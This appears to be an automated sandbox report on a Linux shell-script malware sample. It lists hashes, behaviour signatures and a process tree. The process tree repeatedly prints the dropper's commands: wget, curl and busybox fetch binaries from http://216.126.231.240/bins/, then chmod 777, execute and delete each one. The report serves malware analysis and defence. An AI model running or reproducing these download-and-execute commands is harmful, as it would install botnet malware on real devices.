Analysis
-
max time kernel
78s -
max time network
80s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
09-11-2024 16:23
Static task
static1
Behavioral task
behavioral1
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
Resource
debian9-mipsel-20240611-en
General
-
Target
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
-
Size
10KB
-
MD5
17fadac61f699e8688b92fa8096ee980
-
SHA1
83b7df16777df7eb876af7062643a8d30cddb2ca
-
SHA256
bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8b
-
SHA512
59ce1a1990e0f04de41aac37d50304d031af6b8f68ad765cdb43e9ebfc5bb1b29ed072b24adf1cfa3c505e8bd4bef1c219324a8941fd95166688ed33e590aedd
-
SSDEEP
192:+iVAFfHv6mhWd19zxz5zN2KBd2fHv6mS1Pzxz5zN2K1:+iVAFfHv6mhWdPdlN2KBd2fHv6mShdlX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 732 chmod 912 chmod 852 chmod 746 chmod 774 chmod 801 chmod 894 chmod 960 chmod 738 chmod 858 chmod 864 chmod 870 chmod 876 chmod 900 chmod 906 chmod 807 chmod 826 chmod 888 chmod 930 chmod 936 chmod 966 chmod 882 chmod 954 chmod 972 chmod 918 chmod 942 chmod 924 chmod 948 chmod -
Executes dropped EXE 28 IoCs
Processes:
Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5ppqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWYp7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNpY3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQOCuxEGmaojd5yxu81G3tEjnF17QChWrXZvktMzOTGU5viRhlyCISkxBFzQNvTZBftm1nSS5DFRTHTeId6MC1OsaykfRC5cK3vdT6ZqxNISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBrMTlIirGKPb0g4OKsaUQYzJG4z3T6D155jOuknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZoKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9NusSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQOCuxEGmaojd5yxu81G3tEjnF17QChWrXZvkdxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWYp7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNpY3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nSS5DFRTHTeId6MC1OsaykfRC5cK3vdT6ZqxNISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBroKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9NMTlIirGKPb0g4OKsaUQYzJG4z3T6D155jOuknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZRgqkovkducq3fGzvTPq7wBvXdRpFtBGn5ppqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5ioc pid process /tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p 733 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p /tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 739 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY 747 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp 776 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 802 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO 808 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk 827 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS 853 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS /tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx 859 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx /tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr 865 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr /tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO 871 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO /tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs 877 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs /tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ 883 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ /tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N 889 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO 895 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk 901 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY 907 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp 913 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 919 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS 925 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS /tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx 931 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx /tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr 937 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr /tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N 943 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N /tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO 949 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO /tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs 955 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs /tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ 961 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ /tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p 967 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p /tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 973 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr curl File opened for modification /tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ curl File opened for modification /tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N curl File opened for modification /tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N curl File opened for modification /tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO curl File opened for modification /tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx curl File opened for modification /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 curl File opened for modification /tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p curl File opened for modification /tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p curl File opened for modification /tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs curl File opened for modification /tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 curl File opened for modification /tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO curl File opened for modification /tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ curl File opened for modification /tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 curl File opened for modification /tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr curl File opened for modification /tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs curl File opened for modification /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp curl File opened for modification /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO curl File opened for modification /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk curl File opened for modification /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS curl File opened for modification /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO curl File opened for modification /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp curl File opened for modification /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS curl File opened for modification /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY curl File opened for modification /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 curl File opened for modification /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk curl File opened for modification /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY curl File opened for modification /tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx curl
Processes
-
/tmp/bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN/tmp/bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
/usr/bin/wgetwget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:707
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:724 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:731
-
/bin/chmodchmod 777 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- File and Directory Permissions Modification
PID:732 -
/tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p./Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵
- Executes dropped EXE
PID:733 -
/bin/rmrm Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p2⤵PID:734
-
/usr/bin/wgetwget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:735
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:737
-
/bin/chmodchmod 777 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- File and Directory Permissions Modification
PID:738 -
/tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5./pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵
- Executes dropped EXE
PID:739 -
/bin/rmrm pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U52⤵PID:740
-
/usr/bin/wgetwget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:741
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:743
-
/bin/chmodchmod 777 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- File and Directory Permissions Modification
PID:746 -
/tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY./dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Executes dropped EXE
PID:747 -
/bin/rmrm dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:750
-
/usr/bin/wgetwget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:751
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:768
-
/bin/chmodchmod 777 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- File and Directory Permissions Modification
PID:774 -
/tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp./p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Executes dropped EXE
PID:776 -
/bin/rmrm p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:779
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:780
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:799
-
/bin/chmodchmod 777 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- File and Directory Permissions Modification
PID:801 -
/tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7./Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Executes dropped EXE
PID:802 -
/bin/rmrm Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:803
-
/usr/bin/wgetwget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:804
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:806
-
/bin/chmodchmod 777 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- File and Directory Permissions Modification
PID:807 -
/tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO./usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Executes dropped EXE
PID:808 -
/bin/rmrm usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:809
-
/usr/bin/wgetwget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:810
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:819
-
/bin/chmodchmod 777 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- File and Directory Permissions Modification
PID:826 -
/tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk./CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Executes dropped EXE
PID:827 -
/bin/rmrm CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:830
-
/usr/bin/wgetwget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:832
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:848
-
/bin/chmodchmod 777 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- File and Directory Permissions Modification
PID:852 -
/tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS./tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵
- Executes dropped EXE
PID:853 -
/bin/rmrm tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS2⤵PID:854
-
/usr/bin/wgetwget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:855
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:857
-
/bin/chmodchmod 777 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- File and Directory Permissions Modification
PID:858 -
/tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx./S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵
- Executes dropped EXE
PID:859 -
/bin/rmrm S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx2⤵PID:860
-
/usr/bin/wgetwget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:861
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:863
-
/bin/chmodchmod 777 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr./NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵
- Executes dropped EXE
PID:865 -
/bin/rmrm NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr2⤵PID:866
-
/usr/bin/wgetwget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:867
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:869
-
/bin/chmodchmod 777 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- File and Directory Permissions Modification
PID:870 -
/tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO./MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵
- Executes dropped EXE
PID:871 -
/bin/rmrm MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO2⤵PID:872
-
/usr/bin/wgetwget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:873
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:875
-
/bin/chmodchmod 777 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- File and Directory Permissions Modification
PID:876 -
/tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs./uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵
- Executes dropped EXE
PID:877 -
/bin/rmrm uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs2⤵PID:878
-
/usr/bin/wgetwget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:879
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:881
-
/bin/chmodchmod 777 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- File and Directory Permissions Modification
PID:882 -
/tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ./4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵
- Executes dropped EXE
PID:883 -
/bin/rmrm 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ2⤵PID:884
-
/usr/bin/wgetwget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:885
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:887
-
/bin/chmodchmod 777 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- File and Directory Permissions Modification
PID:888 -
/tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N./oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵
- Executes dropped EXE
PID:889 -
/bin/rmrm oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N2⤵PID:890
-
/usr/bin/wgetwget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:891
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:893
-
/bin/chmodchmod 777 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- File and Directory Permissions Modification
PID:894 -
/tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO./usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵
- Executes dropped EXE
PID:895 -
/bin/rmrm usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO2⤵PID:896
-
/usr/bin/wgetwget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:897
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:899
-
/bin/chmodchmod 777 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- File and Directory Permissions Modification
PID:900 -
/tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk./CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵
- Executes dropped EXE
PID:901 -
/bin/rmrm CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk2⤵PID:902
-
/usr/bin/wgetwget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:903
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:905
-
/bin/chmodchmod 777 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- File and Directory Permissions Modification
PID:906 -
/tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY./dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵
- Executes dropped EXE
PID:907 -
/bin/rmrm dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY2⤵PID:908
-
/usr/bin/wgetwget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:909
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:911
-
/bin/chmodchmod 777 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- File and Directory Permissions Modification
PID:912 -
/tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp./p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵
- Executes dropped EXE
PID:913 -
/bin/rmrm p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp2⤵PID:914
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:915
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵PID:917
-
/bin/chmodchmod 777 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- File and Directory Permissions Modification
PID:918 -
/tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7./Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq72⤵
- Executes dropped EXE
PID:919 -
